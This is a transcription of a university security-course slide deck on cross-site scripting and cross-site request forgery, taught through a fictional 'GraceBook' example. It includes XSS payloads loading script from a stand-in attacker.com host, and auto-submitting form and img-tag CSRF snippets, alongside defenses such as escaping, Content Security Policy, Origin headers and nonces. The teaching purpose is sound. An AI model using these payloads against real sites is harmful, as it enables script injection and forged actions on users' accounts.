Web Security: Vulnerabilities & Attacks

Similar documents
Web Security IV: Cross-Site Attacks

Web Security: Vulnerabilities & Attacks

Web basics: HTTP cookies

How is state managed in HTTP sessions. Web basics: HTTP cookies. Hidden fields (2) The principle. Disadvantage of this approach

Web basics: HTTP cookies

WEB SECURITY: XSS & CSRF

2/16/18. CYSE 411/AIT 681 Secure Software Engineering. Secure Coding. The Web. Topic #11. Web Security. Instructor: Dr. Kun Sun

2/16/18. Secure Coding. CYSE 411/AIT 681 Secure Software Engineering. Web Security Outline. The Web. The Web, Basically.

CS 161 Computer Security

Security for the Web. Thanks to Dave Levin for some slides

Common Websites Security Issues. Ziv Perry

last time: command injection

Lecture 17 Browser Security. Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Some slides from Bailey's ECE 422

CIS 4360 Secure Computer Systems XSS

Security for the Web. Thanks to Dave Levin for some slides

Exploiting and Defending: Common Web Application Vulnerabilities

Web 2.0 and AJAX Security. OWASP Montgomery. August 21 st, 2007

CS 161 Computer Security

Penetration Test Report

WHY CSRF WORKS. Implicit authentication by Web browsers

Is Browsing Safe? Web Browser Security. Subverting the Browser. Browser Security Model. XSS / Script Injection. 1. XSS / Script Injection

CS 142 Winter Session Management. Dan Boneh

Information Security CS 526 Topic 8

Client Side Injection on Web Applications

Computer Security 3e. Dieter Gollmann. Chapter 18: 1

Web Security II. Slides from M. Hicks, University of Maryland

Robust Defenses for Cross-Site Request Forgery

Information Security CS 526 Topic 11

Robust Defenses for Cross-Site Request Forgery

Content Security Policy

CSC 482/582: Computer Security. Cross-Site Security

Abusing Windows Opener to Bypass CSRF Protection (Never Relay On Client Side)

EasyCrypt passes an independent security audit

RBS NetGain Enterprise Manager Multiple Vulnerabilities of 11

Security. CSC309 TA: Sukwon Oh

WEB SECURITY WORKSHOP TEXSAW Presented by Solomon Boyd and Jiayang Wang

BOOSTING THE SECURITY

Application vulnerabilities and defences

CSE361 Web Security. Attacks against the client-side of web applications. Nick Nikiforakis

More attacks on clients: Click-jacking/UI redressing, CSRF

Biting the Hand that Feeds You

Chrome Extension Security Architecture

BOOSTING THE SECURITY OF YOUR ANGULAR 2 APPLICATION

Lecture Overview. IN5290 Ethical Hacking

Lecture 6: Web hacking 2, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Session related attacks

Lecture Notes on Safety and Information Flow on the Web: II

Web insecurity Security strategies General security Listing of server-side risks Language specific security. Web Security.

JOE WIPING OUT CSRF

Web Application Security

CSRF in the Modern Age

CSCD 303 Essential Computer Security Fall 2017

CS Paul Krzyzanowski

Computer Security. 14. Web Security. Paul Krzyzanowski. Rutgers University. Spring 2018

CSCD 303 Essential Computer Security Fall 2018

CNIT 129S: Securing Web Applications. Ch 12: Attacking Users: Cross-Site Scripting (XSS) Part 2

JOE WIPING OUT CSRF

Web Application Security. Philippe Bogaerts

Attacks Against Websites. Tom Chothia Computer Security, Lecture 11

Web Attacks, con t. CS 161: Computer Security. Prof. Vern Paxson. TAs: Devdatta Akhawe, Mobin Javed & Matthias Vallentin

Web Attacks CMSC 414. September 25 & 27, 2017

Advanced Web Technology 10) XSS, CSRF and SQL Injection

CHAPTER 8 CONCLUSION AND FUTURE ENHANCEMENTS

zend. Number: Passing Score: 800 Time Limit: 120 min.

Web security: an introduction to attack techniques and defense methods

Neat tricks to bypass CSRF-protection. Mikhail

Ruby on Rails Secure Coding Recommendations

OWASP Top 10 Risks. Many thanks to Dave Wichers & OWASP

Cross-Site Request Forgery in Cisco SG220 series

Web Security. Aggelos Kiayias Justin Neumann

Umbra. Embedded Web Security through Application-Layer Firewalls. 1st Workshop on the Security of Cyber-Physical Systems 22 September 2015

exam. Number: Passing Score: 800 Time Limit: 120 min File Version: Zend Certified Engineer

Application Security through a Hacker s Eyes James Walden Northern Kentucky University

Computer Security CS 426 Lecture 41

Hacking Web Sites Cross Site Scripting

P2_L12 Web Security Page 1

Secure Coding and Code Review. Berlin : 2012

I n p u t. This time. Security. Software. sanitization ); drop table slides. Continuing with. Getting insane with. New attacks and countermeasures:

RKN 2015 Application Layer Short Summary

Some Facts Web 2.0/Ajax Security

Avoiding Web Application Flaws In Embedded Devices. Jake Edge LWN.net URL for slides:

Cross-Site Scripting (XSS) Professor Larry Heimann Web Application Security Information Systems

Multi-Post XSRF Web App Exploitation, total pwnage

HTTP Protocol and Server-Side Basics

CSCE 813 Internet Security Case Study II: XSS

CS 155 Project 2. Overview & Part A

Perslink Security. Perslink Security. Eleonora Petridou Pascal Cuylaerts. System And Network Engineering University of Amsterdam.

Kishin Fatnani. Founder & Director K-Secure. Workshop : Application Security: Latest Trends by Cert-In, 30 th Jan, 2009

Web Security: Web Application Security [continued]

Web Attacks, con t. CS 161: Computer Security. Prof. Vern Paxson. TAs: Devdatta Akhawe, Mobin Javed & Matthias Vallentin

Code Injection Attacks

PROBLEMS IN PRACTICE: THE WEB MICHAEL ROITZSCH

Reflected XSS Cross-Site Request Forgery Other Attacks

Cross Site Request Forgery

Clojure Web Security. FrOSCon Joy Clark & Simon Kölsch

GUI based and very easy to use, no security expertise required. Reporting in both HTML and RTF formats - Click here to view the sample report.

Preparing for the Cross Site Request Forgery Defense

Copyright

Automatically Checking for Session Management Vulnerabilities in Web Applications

XSSFor the win! What can be really done with Cross-Site Scripting.

Welcome to the OWASP TOP 10

Transcription:

Computer Security Course. Web Security: Vulnerabilities & Attacks

Type 2 Type 1 Type 0 Three Types of XSS Type 2: Persistent or Stored The attack vector is stored at the server Type 1: Reflected The attack value is reflected back by the server Type 0: DOM Based The vulnerability is in the client side code

Contexts in HTML Cross site scripting is significantly more complex than the command or SQL injection. The main reason for this is the large number of contexts present in HTML. <a href="http://evil.com" onclick="functioncall()"> Possibly <b>html</b> Text </a>

Contexts in HTML Cross site scripting is significantly more complex than the command or SQL injection. The main reason for this is the large number of contexts present in HTML. URI Context HTML Attribute Context <a href="http://evil.com" onclick="functioncall()"> Possibly <b>html</b> Text Event Handler Context </a> HTML Context

Contexts in HTML The blogging application also accepts a homepage from the anonymous commenter. The application uses this value to display a helpful link: <? echo "<a href='".$homepage."'>home</a>";?> Which of the following values for $homepage cause untrusted code execution? a. <script src="http://attacker.com/evil.js"></script> b. '<script src="http://attacker.com/evil.js"></script> c. javascript:alert("evil code executing");

HTML Contexts The blogging application also accepts a homepage from the anonymous commenter. The application uses this value to display a helpful link: <? echo "<a href='".$homepage."'>home</a>";?> Which of the following values for $homepage cause untrusted code execution? a. <script src="http://attacker.com/evil.js"></script> b. '<script src="http://attacker.com/evil.js"></script> c. javascript:alert("evil code executing");

HTML Contexts The blogging application also accepts a homepage from the anonymous commenter. The application uses this value to display a helpful link: <? echo "<a href='".$homepage."'>home</a>";?> Which of the following values for $homepage cause untrusted code execution? a. <script src="http://attacker.com/evil.js"></script> b. '<script src="http://attacker.com/evil.js"></script> c. javascript:alert("evil code executing");

HTML Contexts The blogging application also accepts a homepage from the anonymous commenter. The application uses this value to display a helpful link: <? echo "<a href='".$homepage."'>home</a>";?> Which of the following values for $homepage cause untrusted code execution? a. <script src="http://attacker.com/evil.js"></script> b. '<script src="http://attacker.com/evil.js"></script> c. javascript:alert("evil code executing");

Injection Defenses Defenses: Input validation Whitelists untrusted inputs. Input escaping Escape untrusted input so it will not be treated as a command. Use less powerful API Use an API that only does what you want. Prefer this over all other options.

Input Validation Check whether input value follows a whitelisted pattern. For example, if accepting a phone number from the user, JavaScript code to validate the input to prevent server-side XSS: function validatephonenumber(p){ var phonenumberpattern = /^\(?(\d{3})\)?[- ]?(\d{3})[- ]?(\d{4})$/; return phonenumberpattern.test(p); } This ensures that the phone number doesn t contain a XSS attack vector or a SQL Injection attack. This only works for inputs that are easily restricted.

Parameter Tampering Is the JavaScript check in the previous function on the client sufficient to prevent XSS attacks? a. Yes b. No

Parameter Tampering Is the JavaScript check in the previous function sufficient to prevent XSS attacks? a. Yes b. No

Input Escaping or Sanitization Sanitize untrusted data before outputting it to HTML. Consider the HTML entities functions, which escapes special characters. For example, < becomes <. Our previous attack input, <script src="http://attacker.com/evil.js"></script> becomes <script src="http://attacker.com/evil.js"></script> which shows up as text in the browser.

Context Sensitive Sanitization What is the output of running htmlentities on javascript:evilfunction();? Is it sufficient to prevent cross site scripting? You can try out html entities online at http://www.functions-online.com/htmlentities.html a. Yes b. No

Context Sensitive Sanitization What is the output of running htmlentities on javascript:evilfunction();? Is it sufficient to prevent cross site scripting? You can try out html entities online at http://www.functions-online.com/htmlentities.html a. Yes b. No

Use a less powerful API The current HTML API is too powerful, it allows arbitrary scripts to execute at any point in HTML. Content Security Policy allows you to disable all inline scripting and restrict external script loads. Disabling inline scripts, and restricting script loads to self (own domain) makes XSS a lot harder. See CSP specification for more details.

Use a less powerful API To protect against DOM based XSS, use a less powerful JavaScript API. If you only want to insert untrusted text, consider using the innertext API in JavaScript. This API ensures that the argument is only used as text. Similarly, instead of using innerhtml to insert untrusted HTML code, use createelement to create individual HTML tags and use innertext on each.

Break

Cross-site Request Forgery

Example Application Consider a social networking site, GraceBook, that allows users to share happenings from around the web. Users can click the Share with GraceBook button which publishes content to GraceBook. When users press the share button, a POST request to http://www.gracebook.com/share.php is made and gracebook.com makes the necessary updates on the server.

Running Example Client Browser URL Request GET form.php Web Server form.php www.gracebook.com

Running Example Client Browser URL Request Request Response GET form.php <html><body> Web Server form.php www.gracebook.com

Running Example <html><body> <div> Update your status: <form action="http://www.gracebook.com/share.php" method="post"> <input name="text" value="feeling good!"></input> <input type="submit" value="share"></input> </form> </div> </body></html>

Running Example Update your status: Feeling good! Share Client Browser Displays to user Web Server www.gracebook.com

Running Example Update your status: Feeling good! Share Client Browser Displays to user share.php text=feeling Good! On Share click Web Server share.php www.gracebook.com

Running Example Update your status: Feeling good! Share Client Browser Displays to user share.php text=feeling Good! On Share click Session Cookie Web Server share.php www.gracebook.com

Running Example Update your status: Feeling good! Share Client Browser Displays to user share.php text=feeling Good! On Share click Session Cookie Web Server share.php valid session cookie? www.gracebook.com

Running Example Update your status: Feeling good! Share status: Feeling Good! DB Server Client Browser Displays to user share.php text=feeling Good! On Share click Session Cookie Web Server share.php update user s status with the text Feeling good! www.gracebook.com

Network Requests The HTTP POST Request looks like this: POST /share.php HTTP/1.1 Host: www.gracebook.com User-Agent: Mozilla/5.0 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=utf-8 Referer: https://www.gracebook.com/form.php Cookie: auth=beb18dcd75f2c225a9dcd71c73a8d77b5c304fb8 text=feeling good!

CSRF Attack The attacker, on attacker.com, creates a page containing the following HTML: <form action="http://www.gracebook.com/share.php" method="post" id="f"> <input type="hidden" name="text" value="spam COMMENT"></input> <script>document.getelementbyid('f').submit();</script> What will happen when the user visits the page? a) The spam comment will be posted to user s share feed on gracebook.com b) The spam comment will be posted to user s share feed if the user is currently logged in on gracebook.com c) The spam comment will not be posted to user s share feed on gracebook.com

CSRF Attack The attacker, on attacker.com, creates a page containing the following HTML: <form action="http://www.gracebook.com/share.php" method="post" id="f"> <input type="hidden" name="text" value="spam COMMENT"></input> <script>document.getelementbyid('f').submit();</script> What will happen when the user visits the page? a) The spam comment will be posted to user s share feed on gracebook.com b) The spam comment will be posted to user s share feed if the user is currently logged in on gracebook.com c) The spam comment will not be posted to user s share feed on gracebook.com

CSRF Attack JavaScript code can automatically submit the form in the background to post spam to the user s GraceBook feed. Similarly, a GET based CSRF is also possible. Making GET requests is easier: just an img tag suffices. <img src="http://www.gracebook.com/share.php?text=spam%20comment" />

Example Attack <input type="hidden" Welcome to my harmless site! status: SPAM COMMENT! DB Server Client Browser Displays to user share.php text=spam COMMENT! Via JavaScript POST Session Cookie Web Server share.php update user s status with a spam comment

CSRF Defense Origin headers Introduction of a new header, similar to Referer. Unlike Referer, only shows scheme, host, and port (no path data or query string) Nonce-based Use a nonce to ensure that only form.php can get to share.php.

CSRF via POST requests Consider the Referrer value from the POST request outlined earlier. In the case of the CSRF attacks, will it be different? a. Yes b. No

CSRF via POST requests Consider the Referrer value from the POST request outlined earlier. In the case of the CSRF attacks, will it be different? a. Yes b. No

Origin Header Instead of sending whole referring URL, which might leak private information, only send the referring scheme, host, and port. POST /share.php HTTP/1.1 Host: www.gracebook.com User-Agent: Mozilla/5.0 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=utf-8 Origin: http://www.gracebook.com/ Cookie: auth=beb18dcd75f2c225a9dcd71c73a8d77b5c304fb8 text=hi

Origin Header Instead of sending whole referring URL, which might leak private information, only send the referring scheme, host, and port. POST /share.php HTTP/1.1 Host: www.gracebook.com No path string User-Agent: Mozilla/5.0 or query data Accept: */* Content-Type: application/x-www-form-urlencoded; charset=utf-8 Origin: http://www.gracebook.com/ Cookie: auth=beb18dcd75f2c225a9dcd71c73a8d77b5c304fb8 text=hi

Nonce based protection Recall the expected flow of the application: The message to be shared is first shown to the user on form.php (the GET request) When user assents, a POST request to share.php makes the actual post The server creates a nonce, includes it in a hidden field in form.php and checks it in share.php.

Nonce based protection The form with nonce <form action="share.php" method="post"> <input type="hidden" name="csrfnonce" value="av834favcb623"> <input type="textarea" name="text" value="feeling good!"> POST /share.php HTTP/1.1 Host: www.gracebook.com User-Agent: Mozilla/5.0 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=utf-8 Origin: http://www.gracebook.com/ Cookie: auth=beb18dcd75f2c225a9dcd71c73a8d77b5c304fb8 Text=Feeling good!&csrfnonce=av834favcb623 Server code compares nonce

Legitimate Case Client Browser URL Request GET form.php Web Server form.php

Legitimate Case Client Browser URL Request GET form.php <html><body><input type="hidden" name="csrfnonce" value="av834favcb623"> Request Response Web Server form.php

Legitimate Case Client Browser Update your status: Feeling good! Share <input type="hidden" name="csrfnonce" Displays to user Web Server

Legitimate Case Update your status: Feeling good! Share <input type="hidden" name="csrfnonce" status: Feeling Good! DB Server Client Browser Displays to user share.php text=feeling Good! csrfnonce=av834favcb623 On Share click Session Cookie Web Server share.php update user s status with the text Feeling good! after checking nonce

Attack Case <input type="hidden Welcome to my harmless site! Client Browser Displays to user share.php text=spam COMMENT! Via JavaScript POST Session Cookie Web Server share.php fails to update because nonce value is incorrect

Recap CSRF: Cross Site Request Forgery An attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated. Caused because browser automatically includes authorization credentials such as cookies. Fixed using Origin headers and nonces Origin headers not supported in older browsers.

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback